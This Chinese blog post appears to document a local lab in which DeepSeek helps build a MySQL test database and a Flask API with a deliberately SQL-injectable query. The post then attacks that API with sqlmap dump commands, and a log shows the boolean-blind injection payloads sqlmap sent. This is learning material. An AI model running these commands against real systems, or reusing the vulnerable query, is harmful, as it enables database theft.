当前位置: 首页 > article >正文

网络安全-使用DeepSeek来获取sqlmap的攻击payload

article 2025/3/6 16:50:49

文章目录

  • 概述
  • DeepSeek使用
  • 创建示例数据库
  • 创建API
  • 测试sqlmap
  • 部分日志
  • 参考

概述

今天来使用DeepSeek做安全测试,看看在有思路的情况下实现的快不快。

DeepSeek使用

我有一个思路,想要测试sqlmap工具如何dump数据库的:
连接mysql数据库,创建测试库、表,表至少包含整型、字符型列,插入示例数据
使用Python Flask编写一个API查询数据库并返回内容
使用sqlmap攻击该API
查看API日志
请优化我的思路,并给出相关的代码

在这里插入图片描述

创建示例数据库

-- 创建测试数据库
CREATE DATABASE sqlmap_test;

-- 创建包含多种数据类型的表
USE sqlmap_test;
CREATE TABLE users (
    id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50),
    email VARCHAR(100),
    age INT,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    profile TEXT,
    is_admin BOOLEAN DEFAULT FALSE
);

-- 插入测试数据
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', 'admin@example.com', 30, 'System Administrator', TRUE),
('user1', 'user1@test.com', 25, 'Regular user profile', FALSE),
('test_user', 'test@domain.com', 28, 'Another test user', FALSE);

创建API

# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *

app = Flask(__name__)

# 配置数据库连接
db_config = {
    "host": DB_HOST,
    "user": DB_USER,
    "password": DB_PASSWORD,
    "db": DB_NAME,
    "port": DB_PORT,
    "charset": "utf8mb4",
    "cursorclass": pymysql.cursors.DictCursor
}


# 配置日志系统
def setup_logger():
    # 清除默认处理程序
    app.logger.handlers.clear()

    # 统一日志格式
    formatter = logging.Formatter(
        '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'
    )

    # 访问日志配置
    access_handler = RotatingFileHandler(
        'access.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True  # 延迟文件打开直到实际写入
    )
    access_handler.setFormatter(formatter)
    access_handler.setLevel(logging.INFO)
    app.logger.addHandler(access_handler)
    app.logger.setLevel(logging.INFO)

    # SQL日志配置(独立logger)
    sql_handler = RotatingFileHandler(
        'sql.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True
    )
    sql_handler.setFormatter(formatter)
    sql_handler.setLevel(logging.INFO)

    sql_logger = logging.getLogger('sql')
    sql_logger.propagate = False  # 禁止传播到根logger
    sql_logger.setLevel(logging.INFO)
    sql_logger.addHandler(sql_handler)


# 确保在应用初始化后配置日志
setup_logger()


def get_db_connection():
    return pymysql.connect(**db_config)


@app.route('/users', methods=['GET'])
def get_users():
    search = request.args.get('search', '')
    # 强制立即刷新访问日志
    app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")
    app.logger.handlers[0].flush()
    conn = get_db_connection()
    try:

        with conn.cursor() as cursor:
            # 存在漏洞的查询
            query = f"SELECT * FROM users WHERE username = '{search}'"

            # 记录SQL并强制刷新
            sql_logger = logging.getLogger('sql')
            sql_logger.info(f"EXECUTE SQL: {query}")
            sql_logger.handlers[0].flush()

            cursor.execute(query)
            results = cursor.fetchall()

        # 转换datetime为字符串
        for row in results:
            if 'created_at' in row and isinstance(row['created_at'], datetime):
                row['created_at'] = row['created_at'].isoformat()
        app.logger.info(json.dumps(results), exc_info=True)
        return jsonify(results)
    except pymysql.Error as e:
        # 记录完整错误信息
        error_msg = f"Database error ({e.args[0]}): {e.args[1]}"
        app.logger.error(error_msg, exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Database error"})
    except Exception as e:
        app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Server error"})
    finally:
        if 'conn' in locals():
            conn.close()


if __name__ == '__main__':
    # 禁用重载器以避免重复日志
    app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)

运行后访问

http://127.0.0.1:5000/users?search=test_user

结果如下:
在这里插入图片描述

测试sqlmap

python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin -dump --dump-format csv --batch

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
整体来说,实现的还挺快的,只有API实现时微调了一下日志和响应码。
ps:话说我只是测试下DeepSeek,sqlmap咋还出错了,两个test_user是什么鬼…

部分日志

[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'

参考

腾讯元宝
sqlmap


http://www.kler.cn/a/567591.html

相关文章:

  • 【自学笔记】DevOps基础知识点总览-持续更新
  • idea 编码设置
  • React的TSX中如何同时使用CSS模块的类名和字符串类名
  • PyTorch 损失函数解惑:为什么 nn.CrossEntropyLoss 和 nn.BCELoss 的公式看起来一样?
  • fluent-ffmpeg 依赖详解
  • oracle使用PLSQL导出表数据
  • 【FL0087】基于SSM和微信小程序的民宿短租系统
  • Spring Boot 3 集成 RabbitMQ 实践指南
  • AnyDesk 远程桌面控制软件 v9.0.2
  • 数据结构之八大排序算法详解
  • QT基础十、表格组件:QTableWidget
  • JavaScript系列02-函数深入理解
  • 通过统计学视角解读机器学习:从贝叶斯到正则化
  • 华为在不同发展时期的战略选择(节选)
  • Java多线程与高并发专题——深入ReentrantReadWriteLock
  • Python 数据可视化(一)熟悉Matplotlib
  • iOS中的设计模式(六)- 单利模式
  • 问题解决:word导出的pdf图片不清晰?打印机导出的不是pdf,是.log文本文档?
  • 性能测试丨JMeter 分布式加压机制
  • uniapp 阿里云点播 播放bug